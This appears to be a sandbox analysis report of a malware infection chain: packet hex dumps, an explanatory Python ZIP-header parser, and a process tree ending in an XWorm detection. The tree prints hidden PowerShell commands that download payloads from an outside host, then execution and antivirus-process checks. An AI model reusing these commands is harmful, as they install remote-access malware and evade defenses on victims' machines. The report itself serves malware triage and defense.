2024-12-12 18:07:19 UTC | 16384 | IN | Data Raw: ce 1d 83 46 b1 f2 54 b9 9e 4e 71 9d 6a 2d c6 ef 7d 69 7c 91 bb 91 53 be 42 e2 a3 03 11 c3 d0 d7 54 67 d7 39 17 bf 9a 5d fc b1 33 24 71 6a fb 4b 5f c6 9d a8 e2 12 63 c5 15 f3 ae 6b e7 1f 75 09 73 5d ba f8 d1 66 78 27 b5 6f 51 22 07 81 9c b6 b7 53 ae 42 ab 7a 20 3f 20 f1 0d e7 5c d9 fc 1d b7 b3 6b dc f3 5f fb 37 39 03 57 ac 2a de 97 de 5a 52 d0 5d 63 6a b8 58 3f 56 7e 35 6d 1b 3e 81 2f d0 8f 48 d4 da 3e d5 be 5e af b5 7a 3a ed 75 f8 93 6d 8e 1a c4 5f 82 9f 2b dc a2 3c 43 f2 a4 30 47 b4 8d ef 8e 9a db dd d1 11 df 1e cd 9f d3 1d 2c b9 39 62 7e 2c 36 8b c6 20 79 fb 8e d6 e1 a6 09 a5 15 4b 3d 58 c2 8f 8a cf 46 77 2b 8a 1b c0 75 39 1d a3 e5 ee e9 bc 1a e2 7c 1e 5c cd c0 74 7c cf 83 1f 6e b5 41 2b df 1c 0c 8a 3b 38 be 04 47 92 17 7d f5 df 1e 74 b3 3a 75 43 b0 cb
Data Ascii: FTNqj-}i|SBTg9]3$qjK_ckus]fx'oQ"SBz ? \k_79W*ZR]cjX?V~5m>/H>^z:um_+<C0G,9b~,6 yK=XFw+u9|\t|nA+;8G}t:uC
2024-12-12 18:07:19 UTC | 16384 | IN | Data Raw: 93 60 7c 07 2b fd 2b 71 34 1d 1b b7 95 de 6d a8 d1 45 6c d2 7d 90 60 6e e4 d0 fb 59 98 e6 a7 b1 47 af bd f9 91 fe 7d 93 c8 34 a3 7c be bf a9 8b e0 f0 58 d4 f2 63 e3 a6 12 a8 49 60 db 1d 05 fc c4 df 2a bd 75 cf ac e2 8b fa 54 55 91 f5 75 4a 85 a3 44 b9 d4 d2 df 9e 3d d6 cd 4c 30 ac fb 65 88 e8 ad 62 79 9f a3 cd 1e 80 b5 f8 1f 45 c5 2b 26 1f 64 d8 20 21 74 57 6d 68 8f 70 29 c2 c6 ab b6 e7 02 62 d2 9c 41 27 59 c6 f9 52 39 04 51 f6 1c f1 aa c7 58 a5 18 64 48 94 0d 13 56 b6 cd dd 60 ca 70 40 85 2e 96 d0 d5 85 d1 d5 45 d1 d5 69 5c 18 3c 58 66 c8 26 32 38 33 21 96 0b 85 f1 a9 00 4b a9 44 51 92 2d b8 8a 4d 8a ee 7b b3 8e 22 16 09 ea 03 29 00 79 83 c1 1a e8 5a 23 7c 42 78 25 67 e3 63 15 6c 06 58 47 e9 95 97 25 f1 f3 35 5e 21 c7 09 0d d9 56 cf 71 54 84 a3 02 70 1f
Data Ascii: `|++q4mEl}`nYG}4|XcI`*uTUuJD=L0ebyE+&d !tWmhp)bA'YR9QXdHV`p@.Ei\<Xf&283!KDQ-M{")yZ#|Bx%gclXG%5^!VqTp
2024-12-12 18:07:19 UTC | 16384 | IN | Data Raw: f9 b4 5f c7 58 37 b2 67 8f bf fc 08 56 d9 81 6d 04 63 79 f0 2f 7b 2a e2 2c 53 ba 09 64 06 3e e1 91 2b 5a b9 98 92 50 bd 80 bc 92 de 2e 1d 0e 07 79 b2 c7 6e d3 46 d8 40 cc c7 5d c4 77 de 35 60 24 4e bc f5 c9 0a 16 61 c5 65 0a b5 e3 18 3e 51 b0 5a 90 14 d8 10 95 c8 8e f9 c5 63 43 c0 f3 c4 b6 8e aa 13 af 9f fd e8 35 9e 21 ef 3b d1 ed 88 4e 48 44 70 57 27 1b bd 2f 9b 5e df de 69 aa 7e 00 da f6 8a 45 91 be ee 3c e7 2c 1b f1 d4 ff 4b 16 df 42 5b 5b 11 fe 91 e5 3b 55 46 34 6f b0 f0 e5 54 e4 42 70 d6 b9 c3 a8 d0 fe 4e f9 e3 11 75 34 1f c6 99 aa 3a c2 a5 fe 6c bc c6 f8 35 8d 62 01 ec 3a 9e 96 cb 81 6c 73 cb aa 34 29 f3 15 3d 34 a5 ea 29 97 56 6a 41 c2 c4 6e 9a 10 26 a2 e6 1c d6 f3 28 b0 dd ae b1 17 67 1d be 89 c2 e6 81 54 bc 6f bf 81 7a b6 bc f5 5f 9d b5 15 da a6
Data Ascii: _X7gVmcy/{*,Sd>+ZP.ynF@]w5`$Nae>QZcC5!;NHDpW'/^i~E<,KB[[;UF4oTBpNu4:l5b:ls4)=4)VjAn&(gToz_
2024-12-12 18:07:19 UTC | 16384 | IN | Data Raw: 53 2f 24 2c 11 25 a5 75 42 9f ba 65 2a d8 59 b6 9f cc 8b 06 bd f4 bf c0 72 ed 69 97 5c 2f 66 35 40 2e fe d0 44 fa f3 fa 15 f1 98 0f d6 3f 75 25 87 af 9f 71 cb f4 65 55 36 b3 0f e4 bf 16 3e eb bd a2 a1 03 88 6c 47 de 8d 16 85 a2 03 f7 ea 0f d2 5d 3f 05 6b 75 52 03 76 4e 82 9f 7e 8f 25 f8 1b f6 a6 15 d7 0f ae 56 fb 1c 4b fe ca 9d d1 30 87 8c 5a e8 01 71 87 3b 38 62 22 82 11 dd cd c6 85 a7 b5 d0 9c 81 9c a4 08 49 9e 31 d7 37 84 71 67 85 4f 60 56 e9 cc a0 3d 3d 35 a8 31 c8 46 87 2c 07 4a 29 9b 06 f5 76 de 9a 00 75 bf 82 68 9e 96 1c 0b b5 61 e2 42 2b 44 8f 6b af 55 7d 7b 09 70 cb 22 60 53 f1 50 ca 93 e8 e1 d5 af 35 50 d9 28 8b 73 1f 21 20 ac 06 42 0c c4 07 34 43 32 c4 d0 8e 5c 88 8d 58 fb e2 99 f7 e5 23 5c dc f7 13 4c b1 d2 cd e0 c7 f6 d3 e9 e6 6b be 26 87 ec
Data Ascii: S/$,%uBe*Yri\/f5@.D?u%qeU6>lG]?kuRvN~%VK0Zq;8b"I17qgO`V==51F,J)vuhaB+DkU}{p"`SP5P(s! B4C2\X#\Lk&
2024-12-12 18:07:19 UTC | 16384 | IN | Data Raw: b6 88 82 7a 44 8a 25 9b 38 0b 1b f5 8b 83 6d c3 42 b2 f4 78 a4 ee ab 2a 25 99 99 79 af ec e9 c5 ef 7b fc d7 0c 94 83 97 24 f9 7e 7f d8 f2 a8 0a f4 9c 72 0c 7b 79 7f f1 51 5f d1 83 82 b4 21 fa e3 93 7c 8f 83 26 14 95 cf 3d 37 4d 61 71 af fe c7 50 41 e9 f1 17 08 7f b3 42 c1 d3 d5 c3 69 77 27 64 7b bd ba 3b 45 8a 05 d2 e0 c0 0d b2 a6 7b 97 59 3f da ae 1a 6c 81 46 e0 da 93 fe d4 36 57 0d b2 14 1a d3 65 01 f5 28 5b d6 ed a9 65 73 a6 bd f2 bf c3 ef ba 4b 95 a3 8d df 42 92 a0 40 3d 81 1e 42 bc 0c 5c af f1 42 0b 98 1a 04 4d 4a 92 38 f1 c0 3b 4d e0 5e 14 08 fc 68 bf b1 1e 80 cb 6a ef 3f e6 20 5a 09 01 86 c5 10 28 38 0a 29 08 dd 5a be 5b f5 19 86 b2 a7 b7 06 5c 10 f7 8d a1 07 f9 17 5f 08 af 48 4c 3f 41 89 41 08 6c 98 a7 a8 00 0d cd ac 7f 10 82 d3 b8 ce 5c 06 79 b2
Data Ascii: zD%8mBx*%y{$~r{yQ_!|&=7MaqPABiw'd{;E{Y?lF6We([esKB@=B\BMJ8;M^hj? Z(8)Z[\_HL?AAl\y
2024-12-12 18:07:19 UTC | 16384 | IN | Data Raw: 0d c6 fc 81 53 e3 a2 bb ae ce bd 5a 7f 5b 5c 40 7f a4 29 1f 32 7c 35 25 f2 e4 f9 73 14 63 6b a7 6f 26 45 9f ac 2d 4e 76 27 44 7f 9a cf 2a 7a 76 df e8 f2 8b 34 86 cf c7 34 60 55 3f 8f f3 7d 7d 57 67 ea 5b 28 4b 6e ae fb e2 e7 29 e7 c7 75 ae e9 97 7b be 54 d2 d5 31 8b 00 89 f5 5b 3a 35 32 b1 69 0d 8c 07 bc a3 68 62 88 f7 ee f5 88 0f e6 fa 11 df 44 e2 51 cd 63 ee 28 02 5d e0 27 be 1a 34 04 f0 2c fb 7c 9e f8 46 bb bc e1 db db 7d d1 0c ff 21 60 68 46 a4 2c b6 b8 6d fa d7 48 45 67 c0 d4 8c d9 ac 43 d9 80 0f 97 b7 da b4 db 10 92 43 1a ef 47 f1 71 f4 89 9a 59 78 d5 f0 b6 f4 60 e2 58 78 81 d4 23 61 71 fe c6 10 f7 fc f4 87 ed 67 b5 03 93 4f 2f 8c e6 1f 8e bd a0 cf 2c c0 4d 54 1f 61 2c 28 89 ba 24 6a a8 91 f4 d9 3a 4b f6 aa f5 31 8a dd 86 92 a2 97 f4 b5 0a eb c4 b6
Data Ascii: SZ[\@)2|5%scko&E-Nv'D*zv44`U?}}Wg[(Kn)u{T1[:52ihbDQc(]'4,|F}!`hF,mHEgCCGqYx`Xx#aqgO/,MTa,($j:K1
2024-12-12 18:07:19 UTC | 16384 | IN | Data Raw: 37 49 78 13 37 5e b4 97 60 2a e6 0d b2 bc 19 67 ec 3b 9a 45 a7 cc 50 dd ac 3d cd 84 e9 05 95 5d 2e 3c 66 6f 26 74 9f 5f e6 43 1a f7 23 70 b6 bd 31 c0 63 c9 0d 3f 5f c9 49 6f e7 fb 36 b9 30 bf 52 fd 63 65 c3 c9 4c 07 da a0 07 70 6c 9c 10 96 81 c9 86 58 bb 8e 6a 0d 54 f3 1e 6c 48 61 77 97 72 cf a1 57 cb df 5e 5a 05 5d 04 66 6c a1 3c 3b 68 a8 99 88 0a 4a c9 65 38 95 2b d7 82 1c ee 96 eb f6 c2 b8 53 4b 76 71 23 1c 2e 7f a6 10 31 ac b9 00 1d b7 33 a4 fc dd d5 4e 7e e9 e1 cd 46 52 d4 25 c4 8c 7f 06 93 ca ee 14 8c 8c 9b 69 d8 27 91 4f e0 46 c5 05 04 aa ab 17 37 00 dd c6 a4 66 6e d1 56 36 90 14 75 76 b5 0b b3 a2 a4 29 30 94 08 43 60 53 c4 c4 db 52 2f 14 c9 60 11 ae 5a ce 2c ec 33 cc fd e7 10 de 0a 19 46 bd 02 b1 9c f9 f2 45 97 8a 9d 48 57 48 21 64 44 53 0c c2 c2
Data Ascii: 7Ix7^`*g;EP=].<fo&t_C#p1c?_Io60RceLplXjTlHawrW^Z]fl<;hJe8+SKvq#.13N~FR%i'OF7fnV6uv)0C`SR/`Z,3FEHWH!dDS
2024-12-12 18:07:19 UTC | 16384 | IN | Data Raw: 8e c6 84 cc 36 53 d4 04 f9 57 bb cf dc ae 21 91 54 31 d2 b4 f8 b0 99 26 e7 00 e5 1d ee 47 32 48 4f 22 f1 fd 0e 26 ca 1c 35 53 bc 5a ba 4b 23 61 90 cd ec 16 74 77 9b 62 30 30 da f1 2a 0a d8 92 a2 27 f4 bd cc ee ed 9b 74 f5 54 82 a2 d1 79 26 a2 0b 05 91 0d a8 fb 22 01 6a 8a 78 92 72 82 e0 dc a8 f3 fc d5 0a 40 d6 a9 7e fe 0c c3 d8 ac 8a 35 d6 cf 36 f8 56 e8 8c 34 8c 0b e3 a5 e7 26 fe fc af 1b 5c d7 95 5e 4f 41 7c 6c b1 fe db 60 47 fb 4e 8f fe fb 7d 6c 90 c5 c5 32 f5 f5 78 7e da d0 7e 80 d4 ad 27 b1 d4 53 a7 29 34 ad 46 42 cc af 15 28 9d c2 d0 7e 2e be d9 fb 32 de 6f 28 92 22 70 41 26 b5 a8 36 5f f7 a8 e6 cb 84 ac 31 2b 55 13 8e fc 05 ad 53 a2 18 08 be a3 3a 34 87 94 12 12 1a fb ea ed 74 ad a6 19 2d fa ae 0c 33 50 1c 04 51 1e 18 11 b2 94 05 49 1e 9b 81 6d 95
Data Ascii: 6SW!T1&G2HO"&5SZK#atwb00*'tTy&"jxr@~56V4&\^OA|l`GN}l2x~~'S)4FB(~.2o("pA&6_1+US:4t-3PQIm
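The body of the /msword.zip response begins with `50 4b 03 04`, a ZIP local file header, and the member name `msword.exe` is readable right after the 30 fixed header bytes. Those first 40 bytes already tell a triage analyst what the archive is, even though the capture is truncated: the compressed size field reads 3802381 while the uncompressed size field reads 891289591, a ratio of roughly 234:1 that is typical of an executable padded with long runs of identical bytes. The parser below is an added example, not code from the report or from the sample: it decodes the header with `struct`, converts the DOS timestamp, and, under the stated assumption that the archive holds exactly one member with no extra fields and no comment, computes the size such an archive must have and compares it with the Content-Length the server sent (3802499). The 40 header bytes are transcribed from the Data Raw line above as constructed input.

```python
import struct
from dataclasses import dataclass

# First 40 bytes of the /msword.zip response body, transcribed from the
# "Data Raw" line in the report (constructed input for this example).
SAMPLE_HEADER = bytes.fromhex(
    "504b0304 1400 0000 0800 05ab 5c59 89469925 0d053a00 f7ff1f35 0a00 0000"
    "6d73776f72642e657865"
)
# Content-Length announced by the server for the same response.
CONTENT_LENGTH = 3802499

LOCAL_HEADER_SIG = 0x04034B50
LOCAL_HEADER_LEN = 30          # fixed part of a local file header
CENTRAL_HEADER_LEN = 46        # fixed part of a central directory entry
EOCD_LEN = 22                  # end of central directory record, no comment

COMPRESSION = {0: "stored", 8: "deflate", 9: "deflate64", 12: "bzip2",
               14: "lzma", 93: "zstd", 99: "AES"}


@dataclass
class LocalFileHeader:
    version_needed: int
    flags: int
    method: int
    mtime: str
    crc32: int
    compressed_size: int
    uncompressed_size: int
    name: str
    extra_len: int

    @property
    def encrypted(self) -> bool:
        return bool(self.flags & 0x0001)

    @property
    def has_data_descriptor(self) -> bool:
        # bit 3: crc/sizes are zero here and follow the compressed data,
        # so the size check below cannot be made from the first bytes alone
        return bool(self.flags & 0x0008)

    @property
    def method_name(self) -> str:
        return COMPRESSION.get(self.method, f"unknown({self.method})")

    @property
    def single_entry_archive_size(self) -> int:
        """Total archive size if this were the only member, with no extra
        fields and no comments (assumption made for this example)."""
        name_len = len(self.name.encode("utf-8"))
        return (LOCAL_HEADER_LEN + name_len + self.extra_len + self.compressed_size
                + CENTRAL_HEADER_LEN + name_len + self.extra_len + EOCD_LEN)


def dos_datetime(dos_date: int, dos_time: int) -> str:
    """Decode the MS-DOS packed date/time used in ZIP headers."""
    year = 1980 + (dos_date >> 9)
    month = (dos_date >> 5) & 0x0F
    day = dos_date & 0x1F
    hour = dos_time >> 11
    minute = (dos_time >> 5) & 0x3F
    second = (dos_time & 0x1F) * 2
    return f"{year:04d}-{month:02d}-{day:02d} {hour:02d}:{minute:02d}:{second:02d}"


def parse_local_header(data: bytes) -> LocalFileHeader:
    """Parse the first local file header of a ZIP from a (possibly truncated) capture."""
    if len(data) < LOCAL_HEADER_LEN:
        raise ValueError("need at least 30 bytes")
    (sig, ver, flags, method, dtime, ddate, crc, csize, usize,
     name_len, extra_len) = struct.unpack("<IHHHHHIIIHH", data[:LOCAL_HEADER_LEN])
    if sig != LOCAL_HEADER_SIG:
        raise ValueError(f"not a ZIP local file header: {sig:#010x}")
    raw_name = data[LOCAL_HEADER_LEN:LOCAL_HEADER_LEN + name_len]
    if len(raw_name) < name_len:
        raise ValueError("capture too short to contain the member name")
    # bit 11 = UTF-8 names; otherwise cp437 per the ZIP APPNOTE
    name = raw_name.decode("utf-8" if flags & 0x0800 else "cp437")
    return LocalFileHeader(ver, flags, method, dos_datetime(ddate, dtime),
                           crc, csize, usize, name, extra_len)


if __name__ == "__main__":
    h = parse_local_header(SAMPLE_HEADER)
    print(f"{h.name}: {h.method_name}, {h.compressed_size} -> {h.uncompressed_size} bytes, "
          f"mtime {h.mtime}, crc32 {h.crc32:#010x}")
    print("single-member size matches Content-Length:",
          h.single_entry_archive_size == CONTENT_LENGTH)
```

For the captured header the single-member size comes out to exactly 3802499, the Content-Length in the response, so the archive contains nothing besides msword.exe. The member's DOS timestamp decodes to 2024-10-28 21:24:10, a day before the Last-Modified the server reports for the zip itself and a few minutes before the Last-Modified of f.pdf in the previous session. The check is only meaningful when flag bit 3 is clear; with a data descriptor the sizes in the local header are zero and the central directory at the end of the file is needed.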



                                                                          Target ID:0
                                                                          Start time:13:07:06
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\mshta.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:mshta.exe "C:\Users\user\Desktop\c2.hta"
                                                                          Imagebase:0xb90000
                                                                          File size:13'312 bytes
                                                                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:13:07:09
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:13:07:09
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:13:07:09
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"
                                                                          Imagebase:0x6e0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:13:07:13
                                                                          Start date:12/12/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"
                                                                          Imagebase:0x7ff6e8200000
                                                                          File size:5'641'176 bytes
                                                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:7
                                                                          Start time:13:07:13
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
                                                                          Imagebase:0x6e0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:13:07:14
                                                                          Start date:12/12/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                          Imagebase:0x7ff79c940000
                                                                          File size:3'581'912 bytes
                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:9
                                                                          Start time:13:07:14
                                                                          Start date:12/12/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2052 --field-trial-handle=1648,i,6467156151985402777,10202988688681388531,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                          Imagebase:0x7ff79c940000
                                                                          File size:3'581'912 bytes
                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:13
                                                                          Start time:13:07:24
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
                                                                          Imagebase:0x6e0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:14
                                                                          Start time:13:07:55
                                                                          Start date:12/12/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:msword.exe
                                                                          Imagebase:0x400000
                                                                          File size:891'289'591 bytes
                                                                          MD5 hash:C744E054E4EF01832BBF43B81D397B61
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 8%, ReversingLabs
                                                                          Has exited:true

                                                                          Target ID:17
                                                                          Start time:13:07:55
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:18
                                                                          Start time:13:07:55
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:19
                                                                          Start time:13:07:56
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 90
                                                                          Imagebase:0xc40000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:20
                                                                          Start time:13:07:56
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:21
                                                                          Start time:13:07:56
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:22
                                                                          Start time:13:07:57
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:tasklist
                                                                          Imagebase:0x9f0000
                                                                          File size:79'360 bytes
                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:23
                                                                          Start time:13:07:57
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /I "wrsa opssvc"
                                                                          Imagebase:0xb30000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:24
                                                                          Start time:13:07:58
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:tasklist
                                                                          Imagebase:0x9f0000
                                                                          File size:79'360 bytes
                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:25
                                                                          Start time:13:07:58
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                          Imagebase:0xb30000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:26
                                                                          Start time:13:07:59
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /c md 220239
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:27
                                                                          Start time:13:07:59
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /V "DimPieLilHot" Statistical
                                                                          Imagebase:0xb30000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:28
                                                                          Start time:13:07:59
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:29
                                                                          Start time:13:07:59
                                                                          Start date:12/12/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:Carter.pif F
                                                                          Imagebase:0x270000
                                                                          File size:893'608 bytes
                                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
